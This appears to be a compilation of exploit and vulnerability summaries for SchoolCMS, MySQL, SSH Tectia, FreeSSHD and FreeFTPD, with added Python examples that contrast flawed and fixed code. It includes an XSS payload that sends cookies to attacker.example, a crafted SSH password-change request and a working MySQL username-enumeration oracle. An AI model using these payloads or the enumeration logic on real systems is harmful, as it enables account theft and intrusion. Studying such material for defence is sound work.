A persistent (stored) XSS vulnerability was discovered in the SchoolCMS software by PowerItSchools.com. The flaw lies in eventform.php: the event form fields accept JavaScript, and the saved event is rendered back without output encoding, so an attacker can enter a script into the form fields, save the event, and have the script stored and executed for every user who later views that event.
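To illustrate the flaw class, the following Python example (added here; it is not SchoolCMS code, and the field names, template markup and attacker payload are constructed for the demonstration) renders a stored event first as the vulnerable pattern echoes it and then with output encoding applied, and checks whether the attacker's markup survives as markup:

```python
import html

# Constructed attacker submission for an event form (not taken from SchoolCMS).
EVENT_SUBMISSION = {
    "title": 'Board meeting<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
    "location": 'Room 1" onmouseover="alert(document.domain)',
}

# Hypothetical template with one HTML-body context and one attribute context.
TEMPLATE = '<h2>{title}</h2><p class="loc" data-loc="{location}">{location}</p>'


def render_event_unsafe(event: dict) -> str:
    """Model of the vulnerable pattern: stored fields are echoed into HTML as-is."""
    return TEMPLATE.format(**event)


def render_event_safe(event: dict) -> str:
    """Hardened form: HTML-encode every field at output time.

    quote=True also encodes " and ', which is what keeps the attribute
    context (data-loc="...") from being broken out of.
    """
    encoded = {k: html.escape(v, quote=True) for k, v in event.items()}
    return TEMPLATE.format(**encoded)


def contains_live_markup(rendered: str) -> bool:
    """Crude indicator used for the check: did a tag or event handler survive?"""
    return "<script" in rendered or 'onmouseover="' in rendered


if __name__ == "__main__":
    print(render_event_unsafe(EVENT_SUBMISSION))
    print(render_event_safe(EVENT_SUBMISSION))
```

The fix is applied at render time rather than by filtering input: the stored value stays as the user typed it, and each output context encodes it appropriately, so a later template change cannot silently reintroduce the bug.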
This exploit gives an attacker SYSTEM-level access to a Windows machine running a vulnerable version of MySQL Server. The pnscan tool is used to scan for MySQL servers and the mysql_win_remote.pl tool to exploit them. The accounts file holds the user/password combinations to try, and successful hits are saved to the jack.pot file.
An attacker who knows a valid username on an SSH Tectia installation running on UNIX (verified on AIX and Linux) can log in without a password (CVE-2012-5975). The bug is in the SSH USERAUTH CHANGE REQUEST routines, which exist to let a user change their password. Because this code path can be reached before authentication has completed, an attacker can log in without a password by forcing a password change request prior to authentication.
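The message involved is the RFC 4252 password method of SSH_MSG_USERAUTH_REQUEST with its change flag set. The Python example below (added here; it is not SSH Tectia code or the original exploit, and the user database, handler logic and packet framing are constructed for the demonstration: only the unencrypted message payload is built, without the binary-packet length, padding or MAC) encodes and decodes that message and contrasts a handler that honours a change request before verifying the old password, which is the flaw class described, with one that verifies first:

```python
import struct

SSH_MSG_USERAUTH_REQUEST = 50  # RFC 4252 section 5


def _string(b: bytes) -> bytes:
    """SSH 'string' type: uint32 length followed by the bytes (RFC 4251)."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def build_password_request(user: str, password: str, service: str = "ssh-connection") -> bytes:
    """Ordinary password authentication: change flag FALSE, one password string."""
    return (bytes([SSH_MSG_USERAUTH_REQUEST]) + _string(user.encode()) + _string(service.encode())
            + _string(b"password") + b"\x00" + _string(password.encode()))


def build_password_change_request(user: str, old_password: str, new_password: str,
                                  service: str = "ssh-connection") -> bytes:
    """Password change form (RFC 4252 section 8): change flag TRUE, old and new password strings."""
    return (bytes([SSH_MSG_USERAUTH_REQUEST]) + _string(user.encode()) + _string(service.encode())
            + _string(b"password") + b"\x01" + _string(old_password.encode()) + _string(new_password.encode()))


def parse_userauth_request(payload: bytes) -> dict:
    """Decode the payload into a dict; raises on anything that is not a userauth request."""
    if payload[0] != SSH_MSG_USERAUTH_REQUEST:
        raise ValueError("not an SSH_MSG_USERAUTH_REQUEST")
    user, off = _read_string(payload, 1)
    service, off = _read_string(payload, off)
    method, off = _read_string(payload, off)
    msg = {"user": user.decode(), "service": service.decode(), "method": method.decode(),
           "change_password": False}
    if method == b"password":
        change = payload[off] != 0
        off += 1
        if change:
            old, off = _read_string(payload, off)
            new, off = _read_string(payload, off)
            msg.update(change_password=True, old_password=old.decode(), new_password=new.decode())
        else:
            pw, off = _read_string(payload, off)
            msg["password"] = pw.decode()
    return msg


def handle_userauth_flawed(msg: dict, users: dict) -> str:
    """Model of the flaw class (constructed, not Tectia's code): a change request is
    applied before the supplied old password is ever verified, so an empty old
    password for a valid username succeeds. Plain string comparison stands in for
    real credential verification."""
    if msg["method"] != "password" or msg["user"] not in users:
        return "FAILURE"
    if msg["change_password"]:
        users[msg["user"]] = msg["new_password"]
        return "SUCCESS"
    return "SUCCESS" if users[msg["user"]] == msg["password"] else "FAILURE"


def handle_userauth_fixed(msg: dict, users: dict) -> str:
    """Hardened handler: the old password must verify before any change is applied."""
    if msg["method"] != "password" or msg["user"] not in users:
        return "FAILURE"
    if msg["change_password"]:
        if users[msg["user"]] != msg["old_password"]:
            return "FAILURE"
        users[msg["user"]] = msg["new_password"]
        return "SUCCESS"
    return "SUCCESS" if users[msg["user"]] == msg["password"] else "FAILURE"
```

The check a practitioner wants from a server implementation is the second handler's shape: a password-change request is just a password authentication with an extra field, and the old password must be verified exactly as a normal login would be before the new one is stored or a success reply is sent.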
When an attacker authenticates with an incorrect password using the old authentication mechanism of MySQL 4.x and earlier against a MySQL 5.x server, the server responds with a message other than Access Denied when the account exists, which makes user account enumeration possible (CVE-2012-5615). The downside is that the attacker has to reconnect for each enumeration attempt.
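The enumeration oracle is simply a difference between the server's ERR packet for a non-existent user and for an existing one. The Python example below (added here; it is not the original exploit and does not implement the old-style authentication handshake itself) parses MySQL ERR packets and shows the comparison logic, including the detail that the "Access denied" text embeds the username and must be normalised before comparing. The probe function, the user set and the non-Access-denied reply are constructed stand-ins: the page does not show the exact alternative message a real 5.x server returns, so an arbitrary distinct error response represents it here.

```python
import struct

ERR_HEADER = 0xFF
ER_ACCESS_DENIED_ERROR = 1045  # MySQL error code for "Access denied for user ..."


def build_err_packet(code: int, sqlstate: str, message: str, seq: int = 2) -> bytes:
    """Build a MySQL ERR packet in the protocol-4.1 layout, used to construct samples."""
    payload = bytes([ERR_HEADER]) + struct.pack("<H", code) + b"#" + sqlstate.encode() + message.encode()
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def parse_packet(raw: bytes) -> dict:
    """Decode the 4-byte packet header and, for ERR packets, the code, SQL state and message."""
    length = int.from_bytes(raw[:3], "little")
    seq = raw[3]
    payload = raw[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated packet")
    if payload[0] != ERR_HEADER:
        return {"kind": "other", "seq": seq}
    code = struct.unpack_from("<H", payload, 1)[0]
    off = 3
    sqlstate = None
    if payload[off:off + 1] == b"#":          # SQL state marker present with CLIENT_PROTOCOL_41
        sqlstate = payload[off + 1:off + 6].decode()
        off += 6
    return {"kind": "err", "seq": seq, "code": code, "sqlstate": sqlstate,
            "message": payload[off:].decode(errors="replace")}


def response_fingerprint(resp: dict, user: str) -> tuple:
    """What the oracle compares: error code, SQL state and message with the probed
    username masked out, so that 'Access denied for user X' matches for every X."""
    return (resp.get("code"), resp.get("sqlstate"), resp.get("message", "").replace(user, "<user>"))


def enumerate_users(candidates, probe) -> list:
    """probe(user) -> raw ERR packet the server returned for a wrong-password old-auth
    attempt on that user; a real probe opens a fresh connection per call, since the
    server closes the connection after the error. Baseline comes from a name that
    cannot exist; every candidate whose fingerprint differs from it is reported."""
    baseline_user = "zz_no_such_user_7f3a9c"
    baseline = response_fingerprint(parse_packet(probe(baseline_user)), baseline_user)
    return [u for u in candidates if response_fingerprint(parse_packet(probe(u)), u) != baseline]


def fake_server(user: str) -> bytes:
    """Constructed stand-in for a live server (not real server output)."""
    if user in {"root", "backup"}:
        return build_err_packet(1251, "08004", "Client does not support authentication protocol requested by server")
    return build_err_packet(ER_ACCESS_DENIED_ERROR, "28000",
                            f"Access denied for user '{user}'@'10.0.0.5' (using password: YES)")


if __name__ == "__main__":
    print(enumerate_users(["root", "alice", "backup", "guest"], fake_server))
```

Masking the username is the step most quick scripts get wrong: without it every reply looks "different" and the oracle reports every candidate as valid.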
All versions of FreeSSHD are vulnerable to a remote authentication bypass. The vulnerability was discovered and exploited by Kingcope in 2011. To exploit it, the attacker runs the supplied ssh.exe with a valid username and the host. Likely usernames include root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test, ssh, sftp and ftp, or anything else the attacker can think of. The banner of the most recent vulnerable version is SSH-2.0-WeOnlyDo 2.1.3.
This exploit bypasses authentication and gains SYSTEM-level access on FreeFTPD servers. It uses a modified ssh.exe to bypass authentication, then uploads nullevent.exe, MSVCR100.dll and nullevent.mof to the server. The nullevent.mof file triggers execution of the connect-back shell, which connects to the attacker's netcat listener after about one minute. Note that this MOF step relies on the WMI service automatically compiling .mof files dropped into its mof directory, a behaviour of Windows XP and Server 2003 that later Windows versions removed.
This exploit uses the Perl Net::MySQL module to connect to a MySQL server and send a command in a malformed packet, which crashes the server and terminates the connection.
As seen below, $edx and $edi are fully controlled at the current instruction, 0x83a6b24 <free_root+180>: mov (%edx),%edi, meaning a 4-byte value can be placed at a 4-byte controlled address; with this, function pointers and GOT entries can be rewritten to execute arbitrary code. A low-privileged user account is needed. Beware: this script changes the user's password to an undefined value.
A stack-based buffer overflow exists in MySQL Server versions up to and including 5.5.19-log (also tested with Ver 5.1.53-log for suse-linux-gnu). An unprivileged user (any account, including the anonymous account) can trigger it to overwrite the instruction pointer with 0x41414141, which, when properly exploited, yields a shell as the 'mysql' user.
This exploit is a post-authentication UDF technique that gives attackers SYSTEM-level access to a Windows machine running Oracle MySQL. It requires a valid database administrator username and password to work. The exploit is mirrored at the farlight website, http://www.farlight.org, and includes a mass scanner. Installation instructions are provided in the text.